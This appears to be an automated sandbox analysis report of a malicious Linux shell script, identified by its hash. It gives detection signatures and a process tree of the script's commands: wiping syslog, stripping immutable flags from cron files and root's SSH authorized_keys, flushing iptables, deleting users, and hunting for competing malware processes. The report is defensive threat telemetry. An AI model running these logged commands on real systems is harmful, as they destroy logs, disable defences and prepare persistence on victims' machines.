Analysis
-
max time kernel
150s -
max time network
11s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/02/2025, 03:44
Static task
static1
Behavioral task
behavioral1
Sample
d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh
-
Size
35KB
-
MD5
bec1e7369a1b7fe45f19f14e65c0c29d
-
SHA1
8a39e51ad5d6a0ee0d6d8533a0acae0d9cfacd5f
-
SHA256
d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c
-
SHA512
1feaed1a5c1dbdfb703cb4b787542705ca7efbb917e360ee1b276a150b6ae13ba1f4a9f05e1b38454f08d1b7880076bccdd6c159a80eb8361550f034c0966892
-
SSDEEP
768:b87mzQ5VFNcDAFLcIwgnoYq0xFBvgmuNytmuz:bOVF+D6cIwgosFz
Malware Config
Signatures
-
Flushes firewall rules 1 TTPs 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 721 iptables -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
pid Process 727 sudo -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1468 xargs 1538 xargs 1659 xargs 1665 xargs 1689 xargs 748 chattr 1520 xargs 1641 xargs 1698 xargs 1728 xargs 1949 xargs 1975 xargs 2045 xargs 1532 xargs 1544 xargs 1838 xargs 2015 xargs 1484 grep 1779 xargs 2049 xargs 1526 xargs 1635 xargs 1653 xargs 1699 sed 1731 xargs 1980 xargs 2035 xargs 1909 xargs 1914 xargs 1934 xargs 1954 xargs 2030 xargs 1853 xargs 1919 xargs 2000 xargs 2005 xargs 1482 grep 1599 xargs 1701 xargs 1695 xargs 1719 xargs 1725 xargs 1489 xargs 1605 xargs 1617 xargs 1944 xargs 709 chattr 1480 xargs 1514 xargs 1713 xargs 1823 xargs 1828 xargs 1899 xargs 1904 xargs 719 chattr 746 chattr 1509 xargs 1629 xargs 1802 xargs 1858 xargs 1869 xargs 1985 xargs 1499 xargs 1683 xargs -
Creates/modifies Cron job 1 TTPs 13 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.dTtz0s crontab File opened for modification /var/spool/cron/crontabs/tmp.WgDwKQ crontab File opened for modification /var/spool/cron/crontabs/tmp.tKx6Ah crontab File opened for modification /var/spool/cron/crontabs/tmp.yOefiV crontab File opened for modification /var/spool/cron/crontabs/tmp.bs4MGh crontab File opened for modification /var/spool/cron/crontabs/tmp.TDm8jw crontab File opened for modification /var/spool/cron/crontabs/tmp.zC9Xbk crontab File opened for modification /var/spool/cron/crontabs/tmp.7frOOv crontab File opened for modification /var/spool/cron/crontabs/tmp.2lAALS crontab File opened for modification /var/spool/cron/crontabs/tmp.gl6yOF crontab File opened for modification /var/spool/cron/crontabs/tmp.Ve1q6h crontab File opened for modification /var/spool/cron/crontabs/tmp.L1vlnt crontab File opened for modification /var/spool/cron/crontabs/tmp.opwvkT crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online exim4 File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online sysctl File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
pid Process 1481 ps 1925 ps 2021 ps 1464 ps 1485 ps 1540 ps 1854 ps 1950 ps 1986 ps 2036 ps 1849 ps 1865 ps 1895 ps 1900 ps 1940 ps 1945 ps 2031 ps 2070 ps 1775 ps 1824 ps 2080 ps 1476 ps 2041 ps 1814 ps 1870 ps 1935 ps 1834 ps 1910 ps 1495 ps 1829 ps 1890 ps 1976 ps 1981 ps 2075 ps 1500 ps 1483 ps 1930 ps 1955 ps 2026 ps 2006 ps 2065 ps 1875 ps 1880 ps 1765 ps 1905 ps 1885 ps 1991 ps 1996 ps 2011 ps 2016 ps 2055 ps 1961 ps 1966 ps 2001 ps 1770 ps 1819 ps 1839 ps 1844 ps 1859 ps 1915 ps 1490 ps 1920 ps 1971 ps 2046 ps -
description ioc Process File opened for reading /proc/375/cmdline pkill File opened for reading /proc/15/cmdline pkill File opened for reading /proc/77/cmdline ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/320/status ps File opened for reading /proc/351/cmdline ps File opened for reading /proc/320/status pkill File opened for reading /proc/74/cmdline pkill File opened for reading /proc/320/cmdline pkill File opened for reading /proc/6/status pkill File opened for reading /proc/76/cmdline ps File opened for reading /proc/320/status ps File opened for reading /proc/165/stat ps File opened for reading /proc/477/status ps File opened for reading /proc/15/status ps File opened for reading /proc/82/cmdline ps File opened for reading /proc/1855/stat ps File opened for reading /proc/76/cmdline ps File opened for reading /proc/70/status ps File opened for reading /proc/1908/status ps File opened for reading /proc/13/stat ps File opened for reading /proc/320/status ps File opened for reading /proc/477/stat ps File opened for reading /proc/510/status pkill File opened for reading /proc/77/status pkill File opened for reading /proc/165/status pkill File opened for reading /proc/75/cmdline pkill File opened for reading /proc/1753/cmdline pkill File opened for reading /proc/324/status ps File opened for reading /proc/8/stat ps File opened for reading /proc/115/stat ps File opened for reading /proc/514/stat ps File opened for reading /proc/710/cmdline pkill File opened for reading /proc/2/status ps File opened for reading /proc/1900/cmdline ps File opened for reading /proc/24/stat ps File opened for reading /proc/477/cmdline ps File opened for reading /proc/15/status pkill File opened for reading /proc/13/stat ps File opened for reading /proc/115/status ps File opened for reading /proc/9/cmdline pkill File opened for reading /proc/2061/stat ps File opened for reading /proc/self/maps awk File opened for reading /proc/13/stat ps File opened for reading /proc/710/status ps File opened for reading /proc/1820/cmdline ps File opened for reading /proc/320/status ps File opened for reading /proc/1960/stat ps File opened for reading /proc/399/stat ps File opened for reading /proc/1/cmdline pkill File opened for reading /proc/4/cmdline pkill File opened for reading /proc/uptime ps File opened for reading /proc/1854/stat ps File opened for reading /proc/7/cmdline ps File opened for reading /proc/23/stat ps File opened for reading /proc/399/status ps File opened for reading /proc/165/stat ps File opened for reading /proc/7/status pkill File opened for reading /proc/150/status ps File opened for reading /proc/37/status ps File opened for reading /proc/703/stat ps File opened for reading /proc/150/cmdline ps File opened for reading /proc/77/stat ps File opened for reading /proc/114/cmdline ps -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1420 ls 2013 grep 2043 grep -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/log_rot d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh
Processes
-
/tmp/d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh/tmp/d5b2d30c7a94cd8d14c44162e61d593fd328d7460cf6895399601bb84aebf71c.sh1⤵
- Writes file to tmp directory
PID:706 -
/bin/rmrm -rf /var/log/syslog2⤵PID:708
-
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
PID:709
-
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵PID:714
-
-
/usr/bin/chattrchattr -R -ia /var/spool/cron2⤵PID:717
-
-
/usr/bin/chattrchattr -ia /etc/crontab2⤵
- Attempts to change immutable files
PID:719
-
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:721
-
-
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:727 -
/usr/sbin/sendmailsendmail -t3⤵PID:735
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOSi-0000Br-3t4⤵
- Reads CPU attributes
PID:751
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:739
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmOSi-0000Bv-4E4⤵PID:752
-
-
-
/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
- Reads CPU attributes
PID:741
-
-
-
/usr/sbin/userdeluserdel akay2⤵PID:743
-
-
/usr/sbin/userdeluserdel vfinder2⤵PID:744
-
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵
- Attempts to change immutable files
PID:746
-
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵
- Attempts to change immutable files
PID:748
-
-
/bin/rmrm -rf "/tmp/addres*"2⤵PID:749
-
-
/bin/rmrm -rf "/tmp/walle*"2⤵PID:750
-
-
/bin/rmrm -rf /tmp/keys2⤵PID:753
-
-
/bin/lsls -latrh /proc/12⤵PID:756
-
-
/bin/grepgrep exe2⤵PID:757
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:760
-
-
/bin/grepgrep exe2⤵PID:764
-
-
/bin/lsls -latrh /proc/102⤵PID:763
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:766
-
-
/bin/lsls -latrh /proc/1032⤵PID:769
-
-
/bin/grepgrep exe2⤵PID:770
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:774
-
-
/bin/grepgrep exe2⤵PID:777
-
-
/bin/lsls -latrh /proc/112⤵PID:776
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:779
-
-
/bin/grepgrep exe2⤵PID:783
-
-
/bin/lsls -latrh /proc/1142⤵PID:782
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:785
-
-
/bin/grepgrep exe2⤵PID:788
-
-
/bin/lsls -latrh /proc/1152⤵PID:787
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:790
-
-
/bin/grepgrep exe2⤵PID:793
-
-
/bin/lsls -latrh /proc/122⤵PID:792
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:795
-
-
/bin/grepgrep exe2⤵PID:798
-
-
/bin/lsls -latrh /proc/132⤵PID:797
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:800
-
-
/bin/lsls -latrh /proc/142⤵PID:802
-
-
/bin/grepgrep exe2⤵PID:803
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:805
-
-
/bin/grepgrep exe2⤵PID:808
-
-
/bin/lsls -latrh /proc/1442⤵PID:807
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:810
-
-
/bin/grepgrep exe2⤵PID:813
-
-
/bin/lsls -latrh /proc/152⤵PID:812
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:815
-
-
/bin/grepgrep exe2⤵PID:818
-
-
/bin/lsls -latrh /proc/1502⤵PID:817
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:820
-
-
/bin/grepgrep exe2⤵PID:823
-
-
/bin/lsls -latrh /proc/162⤵PID:822
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:825
-
-
/bin/grepgrep exe2⤵PID:828
-
-
/bin/lsls -latrh /proc/1652⤵PID:827
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:830
-
-
/bin/grepgrep exe2⤵PID:833
-
-
/bin/lsls -latrh /proc/172⤵PID:832
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:835
-
-
/bin/grepgrep exe2⤵PID:838
-
-
/bin/lsls -latrh /proc/182⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:840
-
-
/bin/grepgrep exe2⤵PID:843
-
-
/bin/lsls -latrh /proc/192⤵PID:842
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:845
-
-
/bin/grepgrep exe2⤵PID:848
-
-
/bin/lsls -latrh /proc/22⤵PID:847
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:850
-
-
/bin/grepgrep exe2⤵PID:853
-
-
/bin/lsls -latrh /proc/202⤵PID:852
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:855
-
-
/bin/grepgrep exe2⤵PID:858
-
-
/bin/lsls -latrh /proc/212⤵PID:857
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:860
-
-
/bin/grepgrep exe2⤵PID:863
-
-
/bin/lsls -latrh /proc/222⤵PID:862
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:865
-
-
/bin/grepgrep exe2⤵PID:868
-
-
/bin/lsls -latrh /proc/2252⤵PID:867
-
-
